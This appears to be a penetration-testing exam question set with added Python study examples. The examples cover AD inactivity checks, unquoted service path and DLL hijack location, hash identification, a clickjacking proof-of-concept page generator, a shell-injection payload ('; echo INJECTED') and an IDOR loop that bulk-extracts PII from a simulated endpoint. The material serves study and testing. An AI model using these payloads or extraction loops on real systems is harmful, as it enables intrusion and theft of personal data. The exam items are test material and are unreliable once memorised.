A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique to a credentialed scan?
After successfully capturing administrator credentials to a remote Windows machine, a penetration tester attempts to access the system using PSExec but is denied permission. Which of the following shares must be accessible for a successful PSExec connection?
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:
• Code review
• Updates to firewall settings
A penetration tester is performing an annual security assessment for a repeat client. The tester finds indicators of previous compromise. Which of the following would be the most logical steps to follow NEXT?
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
An attacker receives a DHCP address and notices the hostname was populated in the corporate DNS server. Which of the following BEST describes how the attacker can use this information?
A penetration tester has discovered through automated scanning that a Tomcat server allows for the use of default credentials. Using default credentials, the tester is able to upload WAR files to the server. Which of the following is the MOST likely post-exploitation step?
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
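Added example, not part of the original question set: given a dump of user objects and their lastLogonTimestamp values from a domain controller, list the accounts that have not authenticated in the last 21 days. The user records and the assessment date are constructed; the FILETIME conversion (100-nanosecond ticks since 1601-01-01 UTC) is the real encoding Active Directory uses for that attribute.

```python
# Added example (not from the original question set): find AD accounts that
# have not authenticated in the last 21 days from lastLogonTimestamp values.
from datetime import datetime, timedelta, timezone
from typing import Iterable, List, Optional, Tuple

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> Optional[datetime]:
    """Convert an AD FILETIME to an aware datetime; 0 means 'never logged on'."""
    if filetime == 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime, used here only to build sample data."""
    return int((dt - FILETIME_EPOCH) / timedelta(microseconds=1)) * 10


def inactive_accounts(users: Iterable[Tuple[str, int]], now: datetime,
                      days: int = 21) -> List[str]:
    """Return sAMAccountNames whose last logon is older than `days` or unset."""
    cutoff = now - timedelta(days=days)
    stale = []
    for name, filetime in users:
        last = filetime_to_datetime(filetime)
        if last is None or last < cutoff:
            stale.append(name)
    return stale


# Constructed sample: the assessment is run at SAMPLE_NOW.
SAMPLE_NOW = datetime(2024, 3, 1, 9, 0, tzinfo=timezone.utc)
SAMPLE_USERS = [
    ("alice", datetime_to_filetime(SAMPLE_NOW - timedelta(days=5))),
    ("bob", datetime_to_filetime(SAMPLE_NOW - timedelta(days=40))),
    ("carol", datetime_to_filetime(SAMPLE_NOW - timedelta(days=20))),
    ("svc_backup", 0),  # attribute never set: the account has never logged on
]


def demo() -> List[str]:
    return inactive_accounts(SAMPLE_USERS, SAMPLE_NOW)


if __name__ == "__main__":
    print(demo())
```

On the domain controller itself the same question is answered by `dsquery user -inactive 3` (the unit is weeks) or `Search-ADAccount -AccountInactive -TimeSpan 21.00:00:00 -UsersOnly`. Caveat when interpreting either: lastLogonTimestamp is replicated with a granularity of up to 14 days, so a "stale" account may have authenticated more recently than it shows; lastLogon is exact but is not replicated and must be read from every DC.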
A penetration tester needs to provide the code used to exploit a DNS server in the final report. In which of the following parts of the report should the penetration tester place the code?
A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?
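Added example, not part of the original question set: work out which files Windows would try to execute for an unquoted service ImagePath that contains spaces, and which of those the current user could plant. The service entries and the writable directory are constructed; the path-splitting rule is how CreateProcess resolves an unquoted command line, trying each space-delimited prefix with ".exe" appended before it reaches the real binary.

```python
# Added example (not from the original question set): enumerate the
# executables Windows would try for an unquoted service path.
import ntpath  # Windows path semantics, independent of the host OS
from typing import Dict, Iterable, List, Optional


def unquoted_path_candidates(image_path: str) -> List[str]:
    """Executables Windows tries, in order, before reaching the real binary.
    Returns [] when the path is quoted or has no spaces (nothing to hijack)."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return []
    # Cut off service arguments: the binary ends at the first ".exe".
    end = image_path.lower().find(".exe")
    binary = image_path if end == -1 else image_path[:end + 4]
    if " " not in binary:
        return []
    parts = binary.split(" ")
    # Each space is a possible command/argument boundary; the prefix before it
    # is tried as an executable with ".exe" appended.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def first_plantable(image_path: str, writable_dirs: Iterable[str]) -> Optional[str]:
    """First candidate whose directory the attacker can write to, else None."""
    writable = {ntpath.normcase(d.rstrip("\\")) for d in writable_dirs}
    for candidate in unquoted_path_candidates(image_path):
        if ntpath.normcase(ntpath.dirname(candidate)) in writable:
            return candidate
    return None


# Constructed sample: one correctly quoted service, one misconfigured one, and
# a directory the current user happens to be able to write to (assumed ACL).
SAMPLE_SERVICES: Dict[str, str] = {
    "GoodSvc": '"C:\\Program Files\\Vendor App\\bin\\service.exe" -run',
    "BadSvc": "C:\\Program Files\\Vendor App\\bin\\service.exe -run",
}
SAMPLE_WRITABLE = ["C:\\Program Files"]


def audit(services: Dict[str, str], writable_dirs: Iterable[str]) -> Dict[str, Optional[str]]:
    """Map each service to the file the attacker should create, or None."""
    return {name: first_plantable(path, writable_dirs) for name, path in services.items()}


if __name__ == "__main__":
    for name, target in audit(SAMPLE_SERVICES, SAMPLE_WRITABLE).items():
        print(name, "->", target)
```

The candidate list is what to feed into an ACL check on the target (icacls on each candidate's directory). To collect the ImagePath values in the first place, `Get-CimInstance Win32_Service | Select-Object Name, PathName, StartMode, StartName` or `wmic service get name,pathname,startmode,startname` and filter for entries whose PathName is not wrapped in quotes. Planting the file only pays off if the service runs as a privileged account and can be restarted (or the host rebooted) by the tester.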
A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?
A penetration tester notices that the X-Frame-Options header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?
A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?
If a security consultant comes across a password hash that resembles the following
b117 525b3454 70c29ca3d8ae0b556ba8
Which of the following formats is the correct hash type?
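Added example, not part of the original question set: classify a hash string by its encoding and length, the same heuristic that tools such as hashid and hash-identifier apply. Whitespace in a pasted hash is a display artefact and is dropped first. The length table covers common unsalted digests and the prefixes are the standard modular-crypt ones; the sample strings are constructed.

```python
# Added example (not from the original question set): hash type heuristic.
import hashlib
import re
from typing import List

HEX_RE = re.compile(r"^[0-9a-f]+$")

# hex length -> algorithms producing a digest of that size. These cannot be
# told apart by inspection; where the hash came from decides (a 32-char hash
# from a SAM dump is NTLM, one from a web app's users table is usually MD5).
LENGTH_TO_ALGORITHMS = {
    32: ["MD5", "NTLM", "MD4"],
    40: ["SHA-1", "RIPEMD-160"],
    56: ["SHA-224"],
    64: ["SHA-256", "SHA3-256"],
    96: ["SHA-384"],
    128: ["SHA-512", "SHA3-512", "Whirlpool"],
}

# Modular crypt format identifiers ($id$salt$hash).
MCF_PREFIXES = {
    "1": "md5crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
}


def normalise_hash(text: str) -> str:
    """Drop all whitespace (line wraps, grouping spaces)."""
    return "".join(text.split())


def identify_hash(text: str) -> List[str]:
    """Return the candidate algorithms for a hash string, most likely first."""
    h = normalise_hash(text)
    if h.startswith("$"):
        return [MCF_PREFIXES.get(h.split("$")[1], "unknown modular-crypt variant")]
    if not HEX_RE.match(h.lower()):
        return ["not a hex digest (check for base64 or a salted/encoded format)"]
    return LENGTH_TO_ALGORITHMS.get(len(h), [f"unknown hex digest of {len(h)} characters"])


# Constructed samples (no real credentials).
SAMPLE_MD5 = hashlib.md5(b"Winter2024!").hexdigest()
SAMPLE_SHA256 = hashlib.sha256(b"Winter2024!").hexdigest()
SAMPLE_SHA512CRYPT = "$6$rounds=5000$saltsalt$notARealHashBody"  # constructed shape


if __name__ == "__main__":
    for sample in (SAMPLE_MD5, SAMPLE_SHA256, SAMPLE_SHA512CRYPT):
        print(sample[:24], "->", identify_hash(sample))
```

The 32-character hex string in the question above falls into the first bucket: it is consistent with MD5 (and with NTLM, which is the same size), so the tester should check the source of the hash before choosing a hashcat or John mode.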
A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and has identified the following vulnerabilities:
To which of the following should the tester give the HIGHEST priority?
A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE)
A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Select TWO)
A web application scanner reports that a website is susceptible to clickjacking. Which of the following techniques would BEST prove exploitability?
A vulnerability scan is run against a domain hosting a banking application that accepts connections over HTTPS and HTTP protocols. Given the following results:
• SSLv3 supported
• HSTS not enforced
• Application uses weak ciphers
• Vulnerable to clickjacking
Which of the following should be ranked with the HIGHEST risk?
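Added example, not part of the original question set, covering both the missing X-Frame-Options question and the clickjacking proof-of-exploitability question above: decide from a page's response headers whether it can be framed from another origin, and generate the proof-of-concept page a tester would host to demonstrate the issue. The target URL, button coordinates and attacker origin are placeholders.

```python
# Added example (not from the original question set): frameability check and
# clickjacking proof-of-concept generator.
from html import escape
from typing import Mapping


def is_frameable(headers: Mapping[str, str],
                 attacker_origin: str = "https://attacker.example") -> bool:
    """True if a cross-origin <iframe> served from attacker_origin could load
    the page. A CSP frame-ancestors directive, when present, takes precedence
    over X-Frame-Options. Header names are matched case-insensitively."""
    lower = {k.lower(): v.strip() for k, v in headers.items()}
    csp = lower.get("content-security-policy", "")
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            sources = [t.lower().strip("'") for t in tokens[1:]]
            if "*" in sources:
                return True
            # 'none' and 'self' both block a cross-origin framer; an explicit
            # origin permits only that origin (exact match, no host wildcards).
            return attacker_origin.lower() in sources
    xfo = lower.get("x-frame-options", "").upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return False
    # Header missing, malformed, or ALLOW-FROM (ignored by current browsers).
    return True


# Where the decoy button sits on the attacker's page.
DECOY_LEFT, DECOY_TOP = 100, 100


def clickjacking_poc(target_url: str, target_button_left: int,
                     target_button_top: int, opacity: float = 0.0) -> str:
    """HTML page with the target framed invisibly over a decoy button.
    (target_button_left, target_button_top) is where the sensitive control
    sits inside the target page; the frame is offset so that control lands
    exactly under the decoy. Use opacity ~0.3 while aligning, 0 for the demo."""
    frame_left = DECOY_LEFT - target_button_left
    frame_top = DECOY_TOP - target_button_top
    return f"""<!DOCTYPE html>
<html><head><title>You have won!</title></head>
<body>
<button style="position:absolute; left:{DECOY_LEFT}px; top:{DECOY_TOP}px; padding:20px;">
  Claim prize
</button>
<iframe src="{escape(target_url, quote=True)}"
        style="position:absolute; left:{frame_left}px; top:{frame_top}px;
               width:1400px; height:1000px; opacity:{opacity}; z-index:10; border:0;">
</iframe>
</body></html>
"""


if __name__ == "__main__":
    print(is_frameable({"X-Frame-Options": "SAMEORIGIN"}))
    print(clickjacking_poc("https://bank.example/transfer", 400, 250, opacity=0.3))
```

Proving exploitability means serving the generated page from a different origin and showing that a click on the decoy triggers the framed action; a scanner finding based on the missing header alone is only an indicator. The fix is `Content-Security-Policy: frame-ancestors 'none'` (or `'self'`), with `X-Frame-Options: DENY` kept for older clients.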
A penetration tester is reviewing the following output from a wireless sniffer:
Which of the following can be extrapolated from the above information?
A penetration tester is required to report installed shells on compromised systems. Which of the following is the reason?
During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical business function. Which of the following mitigations is BEST for the consultant to conduct?
A penetration tester attempts to perform a UDP port scan against a remote target using an Nmap tool installed onto a non-Kali Linux image. For some reason, the UDP scan fails to start. Which of the following would MOST likely help to resolve the issue?
A security consultant finds a folder in "C:\Program Files" that has writable permission from an unprivileged user account. Which of the following can be used to gain higher privileges?
When conducting reconnaissance against a target, which of the following should be used to avoid directly communicating with the target?
A client has voiced concern about the number of companies being breached by remote attackers who are looking for trade secrets. Which of the following BEST describes the types of adversaries this would identify?
An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email to obtain the CEO's login credentials. Which of the following types of attacks is this an example of?
A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?
An attacker is attempting to gain unauthorized access to a WiFi network that uses WPA2-PSK. Which of the following attack vectors would the attacker MOST likely use?
Given the following Python script:
Which of the following actions will it perform?
After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?
The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Select TWO)
While performing privilege escalation on a Windows 7 workstation, a penetration tester identifies a service that imports a DLL by name rather than an absolute path. To exploit this vulnerability, which of the following criteria must be met?
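Added example, not part of the original question set: model the Windows DLL search order for a library loaded by bare name and find the first searched directory an attacker could plant it in. Directory names, file lists and writable locations are constructed; the ordering is the documented default with SafeDllSearchMode enabled, and the KnownDLLs short-circuit (those libraries are never resolved from disk) is real, though only a subset of that list is included here.

```python
# Added example (not from the original question set): DLL search order model.
import ntpath  # Windows path semantics, independent of the host OS
from typing import Dict, Iterable, List, Optional

# Libraries served from the KnownDLLs section and never searched for on disk
# (illustrative subset of the real list).
KNOWN_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll", "advapi32.dll"}


def dll_search_order(app_dir: str, system_dir: str, windows_dir: str, cwd: str,
                     path_dirs: Iterable[str], safe_search: bool = True) -> List[str]:
    """Directories LoadLibrary consults, in order, for a DLL named without a
    path. With SafeDllSearchMode disabled the current directory moves up to
    second place, which is the classic working-directory hijack."""
    if safe_search:
        order = [app_dir, system_dir, ntpath.join(windows_dir, "System"), windows_dir, cwd]
    else:
        order = [app_dir, cwd, system_dir, ntpath.join(windows_dir, "System"), windows_dir]
    return order + list(path_dirs)


def hijack_location(dll_name: str, order: List[str], existing_files: Iterable[str],
                    writable_dirs: Iterable[str]) -> Optional[str]:
    """First searched directory the attacker can write to that is consulted
    before the directory holding the real DLL (any writable searched directory
    if the DLL is missing altogether). None if the DLL is a KnownDLL or the
    genuine copy is found first."""
    if dll_name.lower() in KNOWN_DLLS:
        return None
    existing = {ntpath.normcase(f) for f in existing_files}
    writable = {ntpath.normcase(d) for d in writable_dirs}
    for directory in order:
        if ntpath.normcase(ntpath.join(directory, dll_name)) in existing:
            return None
        if ntpath.normcase(directory) in writable:
            return directory
    return None


# Constructed sample environment.
SAMPLE_APP_DIR = "C:\\Program Files\\Vendor App"
SAMPLE_ORDER = dll_search_order(
    app_dir=SAMPLE_APP_DIR,
    system_dir="C:\\Windows\\System32",
    windows_dir="C:\\Windows",
    cwd="C:\\Users\\bob",
    path_dirs=["C:\\Tools"],
)
SAMPLE_FILES = ["C:\\Windows\\System32\\helper.dll"]  # where the real DLL lives


def demo() -> Dict[str, Optional[str]]:
    return {
        "app dir writable": hijack_location("helper.dll", SAMPLE_ORDER, SAMPLE_FILES, [SAMPLE_APP_DIR]),
        "only PATH dir writable": hijack_location("helper.dll", SAMPLE_ORDER, SAMPLE_FILES, ["C:\\Tools"]),
        "missing dll, PATH writable": hijack_location("missing.dll", SAMPLE_ORDER, SAMPLE_FILES, ["C:\\Tools"]),
        "known dll": hijack_location("kernel32.dll", SAMPLE_ORDER, SAMPLE_FILES, [SAMPLE_APP_DIR]),
    }


if __name__ == "__main__":
    for case, location in demo().items():
        print(case, "->", location)
```

The model makes the exploitation criteria concrete: the DLL must not be a KnownDLL, the attacker must be able to write to a directory that is searched before the one holding the genuine library (or anywhere in the order if the library is missing), and the planted file must export what the service imports. The payload only runs when the service loads the DLL again, so the tester also needs to restart the service or wait for a reboot. On a live host, Process Monitor filtered on "NAME NOT FOUND" for CreateFile of *.dll shows which loads fall through to a writable location.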
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented. Each password may be used only once.
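Added example, not part of the original question set (the passwords in the original item are not on this page, so the four below are constructed): rank passwords by the number of character sets they draw on, with the brute-force keyspace as a tie-breaker, which is the ordering the item above asks for.

```python
# Added example (not from the original question set): rank passwords by the
# character sets they use, then by brute-force keyspace.
import math
import string
from typing import List

CHARACTER_SETS = [
    ("lowercase", set(string.ascii_lowercase)),
    ("uppercase", set(string.ascii_uppercase)),
    ("digits", set(string.digits)),
    ("symbols", set(string.punctuation)),
]


def character_classes(password: str) -> List[str]:
    """Names of the character sets the password draws from."""
    return [name for name, chars in CHARACTER_SETS if any(c in chars for c in password)]


def keyspace_bits(password: str) -> float:
    """log2 of the brute-force search space for this length and alphabet.
    Each position can be any character from the sets present: pool ** length."""
    classes = character_classes(password)
    pool = sum(len(chars) for name, chars in CHARACTER_SETS if name in classes)
    return len(password) * math.log2(pool) if pool else 0.0


def rank_by_complexity(passwords: List[str]) -> List[str]:
    """Least complex first: fewer character sets, then smaller keyspace."""
    return sorted(passwords, key=lambda p: (len(character_classes(p)), keyspace_bits(p)))


# Constructed sample; deliberately includes a password that looks complex by
# character-set count but is in every wordlist.
SAMPLE_PASSWORDS = ["P@ssw0rd", "password", "Passw0rd", "Password"]


if __name__ == "__main__":
    for rank, pw in enumerate(rank_by_complexity(SAMPLE_PASSWORDS), start=1):
        print(rank, pw, character_classes(pw), round(keyspace_bits(pw), 1))
```

Caveat a tester should put next to this ranking: character-set count measures resistance to brute force only. "P@ssw0rd" uses all four sets and still falls to a dictionary attack with basic substitution rules, which is exactly the dictionary and seasonal password finding in the item further down; the remediation there is a blocklist of common terms and a length minimum, not more character classes.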
Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own. Which of the following URLs can he use to accomplish this attack?
Which of the following attacks is commonly combined with cross-site scripting for session hijacking?
A penetration tester is performing a validation scan after an organization remediated a vulnerability on port 443. The penetration tester observes the following output:
Which of the following has MOST likely occurred?
A penetration tester is performing a code review. Which of the following testing techniques is being performed?
A penetration tester is assessing the security of a web form for a client and enters “;id” in one of the fields. The penetration tester observes the following response:
Based on the response, which of the following vulnerabilities exists?
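Added example, not part of the original question set: the defect that makes a ";id" probe succeed is a form value interpolated into a shell command line, so ";" terminates the intended command and whatever follows runs as well. The vulnerable handler is shown beside the hardened one. The command run is a stand-in: `echo` replaces whatever the real form executes (ping, nslookup, and so on) so that the snippet runs on any POSIX host, and the payload uses `echo INJECTED` where the page's probe uses `id`, which would print the uid/gid line instead.

```python
# Added example (not from the original question set): OS command injection,
# vulnerable and hardened handlers for a hostname form field.
import re
import subprocess

# Allow-list for a DNS hostname: labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def lookup_vulnerable(hostname: str) -> str:
    """VULNERABLE: the value is spliced into a string handed to /bin/sh, so
    shell metacharacters (; | & ` $()) are interpreted by the shell."""
    result = subprocess.run(f"echo {hostname}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def lookup_no_shell(hostname: str) -> str:
    """Argument list and no shell: the whole value is a single argv element,
    so ';' and friends reach the program as ordinary characters."""
    result = subprocess.run(["echo", hostname], capture_output=True, text=True)
    return result.stdout


def is_valid_hostname(value: str) -> bool:
    return len(value) <= 253 and HOSTNAME_RE.match(value) is not None


def lookup_hardened(hostname: str) -> str:
    """Defence in depth: reject anything that is not a hostname, then run
    without a shell."""
    if not is_valid_hostname(hostname):
        raise ValueError("invalid hostname")
    return lookup_no_shell(hostname)


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"
    print(repr(lookup_vulnerable(payload)))  # second command ran
    print(repr(lookup_no_shell(payload)))    # payload echoed back literally
```

When the response to ";id" contains a uid= line, the handler is of the first kind. Note that `lookup_no_shell` on its own already defeats the injection; the allow-list protects the called program from argument abuse (a value starting with "-" being read as an option), which the argv form does not prevent by itself.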
An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application’s network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files indicate secure SSL/TLS connections are failing. Which of the following is MOST likely preventing proxying of all traffic?
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
When communicating the findings of a network vulnerability scan to a client's IT department, which of the following metrics BEST prioritize the severity of the findings? (Select TWO)
During an engagement, an insecure direct object reference vulnerability was discovered that allows the extraction of highly sensitive PII. The tester is required to extract and then exfiltrate the information from a web application with identifiers 1 through 1000 inclusive. When running the following script, an error is encountered:
Which of the following lines of code is causing the problem?
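Added example, not part of the original question set (the script the item refers to is not on this page): an extraction loop over identifiers 1 through 1000 inclusive, written against a constructed in-memory stand-in for the vulnerable endpoint so it runs offline. The record layout and the `fetch_record` function are assumptions; the inclusive-range handling is the point.

```python
# Added example (not from the original question set): IDOR enumeration over
# an inclusive identifier range, with a simulated endpoint.
import json
from typing import Callable, Dict, List, Optional

Record = Dict[str, object]

# Constructed stand-in for the vulnerable resource: every identifier 1..1000
# returns another user's record with no ownership check (the IDOR).
FAKE_RECORDS: Dict[int, Record] = {
    i: {"id": i, "name": f"user{i}", "ssn": f"000-00-{i:04d}"} for i in range(1, 1001)
}


def fetch_record(record_id: int) -> Optional[Record]:
    """Simulates GET /api/users/<id>; None stands for a 404 response."""
    return FAKE_RECORDS.get(record_id)


def extract_range(fetch: Callable[[int], Optional[Record]],
                  first: int, last: int) -> List[Record]:
    """Pull identifiers first..last inclusive.
    range() excludes its upper bound, so the stop value must be last + 1;
    range(first, last) silently drops the final record, which is the kind of
    off-by-one that makes an 'ids 1 through 1000' job come back one short."""
    records = []
    for record_id in range(first, last + 1):
        record = fetch(record_id)
        if record is not None:
            records.append(record)
    return records


def to_jsonl(records: List[Record]) -> str:
    """Serialise one record per line for transfer to the tester's host."""
    return "\n".join(json.dumps(r, sort_keys=True) for r in records) + "\n"


def run_demo() -> List[Record]:
    return extract_range(fetch_record, 1, 1000)


if __name__ == "__main__":
    pulled = run_demo()
    print(len(pulled), "records; last id", pulled[-1]["id"])
    print(to_jsonl(pulled[:2]), end="")
```

Against a live target the `fetch` argument would be a function that performs the HTTP request with the tester's session cookie and returns the parsed body or None on 404; keeping the loop and the transport separate is what makes the range logic testable before PII is touched. Two practical checks before running it for real: confirm the scope authorises bulk extraction of PII, and count the returned records against the expected 1000 so a silent off-by-one or rate-limit drop is noticed.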